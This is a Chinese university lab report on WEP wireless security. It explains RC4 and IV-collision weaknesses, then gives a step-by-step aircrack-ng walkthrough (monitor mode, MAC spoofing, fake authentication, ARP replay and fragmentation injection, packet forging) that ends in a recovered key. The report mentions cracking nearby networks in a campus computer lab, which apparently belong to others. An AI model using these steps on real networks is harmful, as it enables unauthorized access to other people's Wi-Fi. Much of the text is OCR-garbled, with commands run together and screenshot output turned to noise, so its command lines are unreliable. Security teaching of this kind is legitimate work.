无线网络安全实验

实验报告课程名称《信息系统安全技术及应用》实验项目《无线网络安全性研究与实践》实验仪器PC机、特网系 别 信息管理学院专 业信息安全班级 组长姓名_________________组员姓名_ _实验日期2013-成绩 指导教师 北京信息科技大学信息管理学院（课程上机）实验报告实验名称无线网络安全性实验地点信息安全实验实验时间”言梢Q实验名称研究与实践 实验地点 室 实验时I日」 2013-10-9实验原理：数据通过空中电波进行传输时，利用从网上下载的一个程序，很容易就能捕捉到这些数据。这类监视是事先考虑的，所以802.11标准增加了WEP安全。使用WEP,所有数据都被打乱成无法识别的形式。虽然WEP无法阻止恶意的程序拦截，但它确实能阻止普通人员轻松地读取捕捉到的数据。Wep使用RC4算法来加密数据。这是最流行的加密方式之一，并且在许多应用程序中得到了采用，其中包括大多数网上商店所集成的SSL（安全套接字）。RC4使用一个流式加密系统（StreamingCipher），它能为加密的每个数据包分别创建一个不重复的密钥（称为'包密钥”，即packetkey）。为此，它需要合并一个预共享密码的各个字符、一个状态值以及一个IV（初始向量）值来打乱数据。RC4的这部分称为密钥调度算法（KSA）。随即，结果数组成为一个”伪随机生成算法”（PRGA）的种子，后者生成一个密钥流，并与明文进行XOR运算，从而获得密文。实际发送的数据并非只由原始消息构成。它还包括一个称为“校验和”（CRC）的值，一个32位的值。校验和是根据数据包中的数据计算出来的一个不重复的值。校验和用于确保数据在传输过程中的完整性。收到并解密了数据包后，会重新计算校验和，并与原始校验和进行比较。两者相符，就接受数据包，否则就丢弃数据包。

、S-LL、S-LL数据加密好数据后，IV会附加到数据上，同时用一个数据位(比特)来表示数据包已被加密。然后，所有信息广播到空中，由接受方捕捉和解密。XOR +密码流RC4(VfK)初始化向量

〈IV)

加密信息传输数据解密过程是对加密过程的一个逆转。首先，从数据包中移除IV，并将其与共享密钥合并在一起。然后，合并后的值用于重新创建KSA，后者进而用于创建密钥流(Keystream)，密钥流与加密的数据包进行XOR运算，便得到明文输出。然后，从明文中移除校验和(CRC)，并将它与重新计算后所得的CRC进行比较，随后确定对这个数据包的取舍。

但是，RC4的实现是有缺陷的。特别是，如果我们知道了数据加密前的样子，那么对捕捉到的密文和已知的明文进行XOR运算，就能生成密钥流（Keystream）o出现这个缺陷的原因是，WEP是通过合并两个变量，并对这两个变量进行XOR运算来得出密文的。下面一个公式1描述RC4算法的最后一个函数，它负责对数据进行加密。Ciphertext（密文）=Plaintext（明文）XORKeystream（密钥流）WEP使用一个名为初始向量的值，这个值简称为IV（InitalizationVector）。RC4算法使用这个值与预共享密钥合并，从而为每个数据包创建自己的密钥流，从而通过WLAN发送的每个数据包都创建一个新的、不重复的”数据包密钥”。WEP为通过WLAN传送的每个数据包都使用一个3字节的IV。数据发送后，IV会添加在每个加密的数据包之前。这就能保证接收人获得解密数据所需的全部信息。不过，有个潜在的问题。一个字节由8个比特组成，因此，IV的总长度为24比特（8比特/字节*3字节）。如果计算所有可能的IV，那么结果是2人24=16777266个可能的密钥。虽然看起来很大，但它与通信联系起来时，实际是非常小的，原因是可能会重复。IV是一个随机数。当大多数人将“随机”和16777216这样一个数字联系到一起时，第一个反应是，黑客平均必须等待1600万个数据包后，才能收到重复的包。但这种想法是错误的。事实上，考虑到随机性的本质，只需传输5000个包，就会开始重复，这就是我们所说的“冲突”。从而IV的“冲突”，造成了WLANWEP加密被破解的致命弱点。

实验准备（实验环境的搭建、实验仪器的准备等）：本次实验主要涉及了2个实验环境：一：宿舍的实验环境：为了方便研究无线破解的技术和原理，从安协拿回了无线路由器，在宿舍搭建了一个由TP-LINK54MB的无线路由组成的用WEB-64比特加密方式加密的无线局域网。二：机房的实验环境：机房的实验环境不需要自己搭建，有很多现成的无线信号可以供破解，也没有实验仪器需要准备。实验步骤（详细写出实验步骤）：实验准备阶段：（1） 实验装备用具：华硕A8JS（内置Intel3945无线网卡）配备BT3U盘操作系统。IBMT60（内置Intel3945无线网卡）配备BT3硬盘操作系统。（2） 调试各种BT3操作系统，使在BT3下能够上网浏览网页，浏览文档，辅助在BT3下的破解工作，且可以正常运行进行破解工作。实验破解阶段：（1）在BT3操作系统下：一种方法：1.开机运行BT3操作系统，打开一个SHELL命令框，开始输入命令：modprobe-riwl3945卸载3945网卡的原驱动，再输入命令：modprobeipwraw装载支持监听模式的新驱动。»modprobe-riwl3945bt」点modprcibeipwraw2.输入命令：airodump-ngwifi0 开始扫描所有的无线信号，以选择破解的目标。bt-点airodunip-ngwifiOB5SID PWRBeacons#Dmt日，养FsCHMBENCCIPHERAU-HE5SIBao000002ao1+：TSao000002ao1+：TS：E5ia:A6:5i8sa：+c：7E2L:37:7713:F0:06；_LG；LHH:F6:96 0:0Q：6E 0:19:E2 0：00：7D -11727126234294545454沁拒Lckk.jd>:METGEURmaa■jangtian508Stud_o输入命令：macchanger-m＜本机MAC地址＞wifi0来改变自己网卡的MAC地址，确保相同。此步可有可无。故无截图，在此只是点名此步骤。输入命令：airmon-ngstartwifi06激活网卡的监听模式并且工作在wifi0所在的第6频bt-尊airmon-ngstartwifi©6Interface Chipset Driver回ifiO Centrinoa/b/gipwraw-ng(monitormodeenabled)5.输入命令：airodump-ng-wcapture-c6bssid＜所要破解的AP的MAC地址＞wifi0开始按照物理地址和频道所对应的无线信号抓包，并且把所抓到的数据包存为名字capture的文件。btairodLimp-nq--iva-vjcapture-c6wifiO6.输入命令:aireplay-ng-10-e＜所要破解的AP的Essid＞-a＜所要破解的AP的物理地址〉wifi0利用BT3系统自带的-1攻击模式对所要破解的无线路由器进行虚连接攻击，伪造和所要破解AP的伪装连接，为后面的攻击打下基础。bt-taireplay-ng-10-e05261-a001478e51610-h001302130984wifiOTheinterlaceHAC(00:13:02:99:DF:B2)doesn'tmatchthespecifiedMAC(-h).ilconfigwifiOhwether00:13:02:13:09:8422:16:36Waitingforbeaconframe(BSSID:GO:14:78:E5:16:10)onchannel622:16:36SendingAuthenticationRequest(OpenSystem|[ACK]22:16:36Authenticationsuccessful22:16:36SendingAssociationRequest[ACK]22:16:36Associationsuccessful:-)(AID:1)7.输入命令：aireplay-ng-3b＜所要破解的AP的物理地址〉wifi0利用BT3操作系统自带的arp注入攻击模式的-3模式通过不断向AP发送同样的arp请求包，来进行注入式攻击，以便获得大量的有效数据。攻击成功后数据包飞涨。itaireplay-ng-3-b0O1478e5161O-h001302130984wifiOFheinterfaceMAC(00:13:02:99:DF:B2)doesn'tnatchthespecifiedMAC(-h).ifconfigwifiOhwether00:13:02:13:09:84:17:40Waitingforbeaconfraiie(BSSID:00:14:78:E5:16:10)onchannel6savingARPrequestsinreplay_arp-0113-221740.capfoushouldalsostartalrodump-ngtocapturereplies.Jead79680packets(got2725ARPrequestsand46793ACKs)usent8558packets...|500pps)另一种方法：1.开机运行BT3操作系统，打开一个SHELL命令框，开始输入命令：modprobe-riwl3945卸载3945网卡的原驱动，再输入命令：modprobeipwraw装载支持监听模式的新驱动。#modprobe-r1W13945bt--与modprobeipwraw2.输入命令：airodump-ngwifi0 开始扫描所有的无线信号，以选择破解的目标。bt-#airodump-ngwifiO1B5SIDPWRBeacons#Data』r/sCH同BENCCIPHERALTH三5SI000:14:78:E5:16:1001730654.WEPWEP□526100：2a：A6：58：F6：96027Q01154.OPNiCKKjdH00:SO:+C:7E:00:6E0126061154WEPWEP!JETGE^R00:21:27:77:19:E2023435510654.WEPWEP02:12:F0:00:00:70-1292011110PM■jangtian□0:1D:OF:5A:3C:100416654.WEPWEP508StudLO3.输入命令：macchanger-m＜本机MAC地址＞wifi0来改变自己网卡的MAC地址，确保相同。此步可有可无。故无截图，在此只是点名此步骤。4.输入命令：airmon-ngstartwifi06激活网卡的监听模式并且工作在wifi0所在的第6频道。bt-#airmon-ngstartwifit)6Interface Chipset DriverfjifiO Centrinoa/b/gipwraw-ng(monitormodeenabled)5.输入命令：airodump-ng-wcapture-c6-bssid＜所要破解的AP的MAC地址＞wifi0开始按照物理地址和频道所对应的无线信号抓包，并且把所抓到的数据包存为名字是capture的文件。bt打airodump-ng--ivs-vjcapture-c6wifiO6.输入命令:aireplay-ng-10-e＜所要破解的AP的Essid＞-a＜所要破解的AP的物理地址〉wifi0利用BT3系统自带的-1攻击模式对所要破解的无线路由器进行虚连接攻击，伪造和所要破解AP的伪装连接，为后面的攻击打下基础。btSaireplay-ng-10-e05261-aO01478e5161O-h0O13O2L3O984wifiOTheinterlaceHAC(00:13:G2:99:DF:B2)doesn'tmatchthespecifiedMAC(-h).ilconfigwifiOhwether00:13:02:13:09:8422:16:36Waitingforbeaconframe(BSSID:GO:14:78:E5:16:10)onchannel622:16:36SendingAuthenticationRequest(OpenSystem|[ACK]22:16:36Authenticationsuccessful22:16:36SendingAssociationRequest[ACK]22:16:36Associationsuccessful:-)(AID:1)输入命令：airreplay-ng-5-b001478e51610wifi0采用碎片包攻击模式-5，获得一个prga数据包（xor文件）。bt■■=aireplay-ng-5-b0O1478e51610wifiONasourceMAC(-h)specified.UsingthedeviceMACCOO:13:02:99:DF:B2)23:17:日4WaitingforbeaconframetBSSID:00:14:78:E5:16:10)onchannel623:17:04Waitingforadatapacket...Read5667packets...Size:368,FromDS:饥TaDS:1(WEP)BSSID三00:14:78:E5:16:10Dest.r-lAC=FF:FF1FF:FF:FFrFFSourceMAC士QO:!DiFD!84:24i750x0000：08413a01001478e51610001dfd842475.A：...Ki......$u0)40010:ffffffffffffe0Ol00003000c35f247fmil■j.«siajajj,一$0X0020：0707306b87c5a7fb95805dc7f761.0k ].・■・・aOX0OJ0：a3Qdcf2e6曲381f0828e15977咖4830IIII.■■■JnS1ilil■■1/.H0Ok0O40:7fd9def6960c8b6ddlf?cE)a3f6ed38fcrn.8.0x0050；Jddfffd2a9fc8e418bS55行4b2fl...n.A.e._4,,0x0060:a8d957808e38158429e82a0ef3d0..w,8..).*.ii.ir0M0070：058a3054cebca163bl6fc67abtiG388c0..0Tx..c.o.z■ ■jj牌邮:645fSeed3dal4ca22470E7bb272,，d,0k0090:a48682f98bdfb62d043e3b0aa6dcaSbl■■jj4.q jj■■jia■0X0030：521b24919c03bSBa7335ce55d392a766js5.U...■fQxQObO；55fb4dcaebQf31a66152C49da35c9e5ee.M,,,l.aR,..l.nOxOOcO:Id49203df40c5352089b0935ed9bdedd.I.SR..□5■iniOxOOdO:4b94fOeb7dIf41d2085567e0ffld70f9K...).A..Ug....p.-ACUT--Usethispacket?ySavingchosenpacketinreplay_src-0108-2317J5.cap23:17:39Datapacketfound!23:17:39Sendingfragmentedpacket23:17:39GotRELAYEDpacket!!23:17j39Tryingtoget384byteserfake/stream23:17:39GotRELAYEDpacket!!23:17:39Tryingtoget1500bytesofakeystream23:17:59GotRELATEDpacket!!Savingkeystreaminfragment-0108-231739.xorNowyoucanbuildapacketwithpacketforge-ngoutofthat1500byteskeystreambt-#|输入命令：packetforge-ng-0-a<apmac>-h<mymac>-k255.255.255.255-l255.255.255.255yfragment-0108-231739.xor-wmyarp用数据包制造程序packetforge-ng将上面获得的xor数据包伪造成可利用的ARP注入包。btpacketfarge-ng-0-a001478e51610-h -k255,255,2^5,255-1255,255,255,255-yent-0108-231739.xar-wmyarpWrotepacketto:myarp输入命令：aireplay-ng-2-rmyarp-x512wifi0采用交互模式-2，发包注入攻击。btaireplay-ng-2-rmyarp-^512wifii)NosaurceMA匚(-h)specified.Usingthedevicef-lAC(09:13:02:9^:DF:E2)Size:6们FromD5:饥ToD5:1(WEP)BSSID=00：14：78：E5:16：It)Dest,MAC=FF：FF：FF：FF：FF：FFSourceF'lAC-0Q:13:62:99:DF:B2OX.0OOO：08410201001478e515100013&299dfb2.A..OX.001G：fffffffffffi80011000000061cdf5260x0020:5821bf84139a753e6c531430557382c8X!....u>lS.0Us..0x0030：3项^4aa4068226d9bc810e400510ZC1,,,g」，OXOQ40：d908e29eUsethispacket?ySavingchosenpacketinreplay_src-CLO8-232140.capYoushouldalsostartairodump-ngtocapturereplies.§ent3177packets...(512ppsJ总后一步：破解密钥输入：aircrack-ng-n64-b<apmac>packet-02.ivs从上面两种方法主要是获得足够的数据包，数据包里包含足够的IV,从而进行破解。aircrack-ntj-n64-bOOL478e515LOpacket-02.ivsDpeningpacket-02,ivsattackwillberestartedevery5000capturedivs,StsrtingF7Wattackwith3S913ivs,KEYFCUND![71:61:7A:78:63]<ASCII:qazxc)Decryptedcorrectly:1如％n|可以看到密码为："qazxc”（2）在Windows操作系统下：安装3款软件，分别是netstumblerinstaller、WinAircrackPack、omnipeek。Netstumbler是一款用于在Windows系统下检测无线信号各项参数的应用软件，WinAircrackPack是对所抓到WEB数据包进行破解的软件，omnipeek是在Windows操作系统下用于抓包的软件。3款然见安装成功后分别打开3款软件进行试用调试，无错的情况下进入下一步打开netstumbler查看能检测到的无线信号，观察它的强度、无线加密方式，是否适合作为破解目标，最后选定破解目标。选定破解目标后进行运行omnipeek对所选目标开始进行抓包工作，在Windows操作系统下破解需要大量的数据包而且由于破解的是局域网所以没有有效数据开始，最后依靠局域网内的人为的数据传送才抓到了大量的有效数据包。打开WinAircrackPack对所抓到的数据包进行破解，因为数据量较大而且属于暴力破解方式所以等的时间比较长，最后破解成功。注：因为在Windows操作系统下的破解工作是最开始研究的方向，后来一直没有再研究，所以此次实验并未截图，因为破解一次耗时很久也没有重新再做，特此说明。实验问题及解决方案：问题1：最开始使用的VMware虚拟机找不到网卡。在网上搜索相关问题后了解到Vmware不支持笔记本内置的minipci接口的网卡，而使用VM建议配置USB无线网卡。MiniPCI笔记本网卡建议使用CD版、硬盘和U盘启动BT3。问题2：实验过程中输入一些命令例如ifconfig-a、-bssid等命令时提示错误。通过HELP方法查看命令语法发现是因为少输了空格和应该为--bssid仔细核对命令后改正。问题3：在机房破解无线信号的时候建立虚连接不成功。在从网上查阅相关资料和根据以往破解经验的总结后得出所破解网络的AP信号必须达到一定强度而且距离不能太远，还有就是用用户的时候比没有用户成功的概率要大的多。问题4：抓到足够的数据包后却无法顺利利用命令进行破解。经过多次的尝试和分析最后发现是因为无线路由器的加密方式是128bit的WEB加密方式，而不是64位的加密方式，改过来后顺利破解。问题5：无法破解无客户端连接的WEP密码。如果一直是无客户端的AP经过我们的研究由于没有任何数据产生，也就没有数据包可以捕获更没有数据包能够不断重发，产生的一些数据由于没有IV初始化向量导致对破解没有帮助，所以没有客户端连接的Ap是无法破解的。问题6：路由器登陆不成功由于有人在别人不知道的情况下将路由器重置了。重新设置后恢复。问题7：BT3操作系统在运行过程中经常死机。通过网络资料的查阅和与同学的讨论加上对该问题的反复研究尝试，最后得出的结论是USB版本的BT3操作系统本身的稳定性和性能就不如硬盘版的BT3操